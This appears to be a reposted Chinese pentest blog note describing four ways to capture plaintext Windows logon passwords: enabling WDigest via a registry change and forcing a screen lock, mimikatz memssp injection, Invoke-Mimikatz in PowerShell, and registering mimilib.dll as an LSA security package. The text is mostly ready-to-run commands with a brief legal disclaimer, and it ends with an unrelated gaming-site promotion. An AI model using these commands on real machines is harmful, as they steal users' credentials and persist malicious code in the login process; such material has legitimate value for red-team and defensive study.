声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
0x01 前言
这篇文章来自朋友@leafer(阿宝)日常测试笔记,文中没有过多介绍其理论知识,大家可以自己去学习了解一下!
0x02 改注册表(mimitaze存在免杀问题)
pass:需要锁屏等方式
代码语言:javascript代码运行次数:0运行复制
reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v uselogoncredential /t reg_dword /d 1 /f
修改不记录明文密码
代码语言:javascript代码运行次数:0运行复制
reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v uselogoncredential /t reg_dword /d 0 /f
锁屏
代码语言:javascript代码运行次数:0运行复制
rundll32.exe user32.dll,lockworkstation
修改完之后使用命令锁屏,接下来等待用户再次登录一次就可以抓到了
0x03 mimikatz插ssp记录密码
pass:需要锁屏等方式
使用mimikatz的一个功能:
代码语言:javascript代码运行次数:0运行复制
privilege::debug、misc::memssp
修改完之后使用以下命令锁屏,等用户进入后就可以在c:\windows\system32\mimilsa.log里面存储登录的密码
代码语言:javascript代码运行次数:0运行复制
rundll32.exe user32.dll,lockworkstation
0x04 使用invoke-mimikatz.ps1
pass:需要锁屏等方式
代码语言:javascript代码运行次数:0运行复制
import-module .\invoke-mimikatz.ps1 //导入命令invoke-mimikatz -command "misc::memssp" //不需要重启获取 记录的明文密码存储在这个路径下
代码语言:javascript代码运行次数:0运行复制
凭据收集总结:https://cloud.tencent.com/developer/article/1656546
0x05 复制mimilib.dll 修改注册表
pass:需要重新启动系统
(1) 在mimikatz中有32和64两个版本,安装包里分别都带有不同位数的mimilib.dll
(2) 将对应版本的dll文件复制到 c:\windows\system32下
(3) 将以下注册表位置中security packages的值设置为mimilib.dll
代码语言:javascript代码运行次数:0运行复制
reg add hklm\system\currentcontrolset\control\lsa /v "security packages" /t reg_multi_sz /d mimilib.dll /f
(4) 等待系统重启后,在c:\windows\system32生成文件kiwissp.log,记录当前用户的明文口令
代码语言:javascript代码运行次数:0运行复制
渗透技巧-通过credssp导出用户的明文口令:https://3gstudent.github.io/3gstudent.github.io/渗透技巧-通过credssp导出用户的明文口令/
以上就是windows高版本明文密码的详细内容,更多请关注非常游戏网【www.vycc.cn】其他相关内容。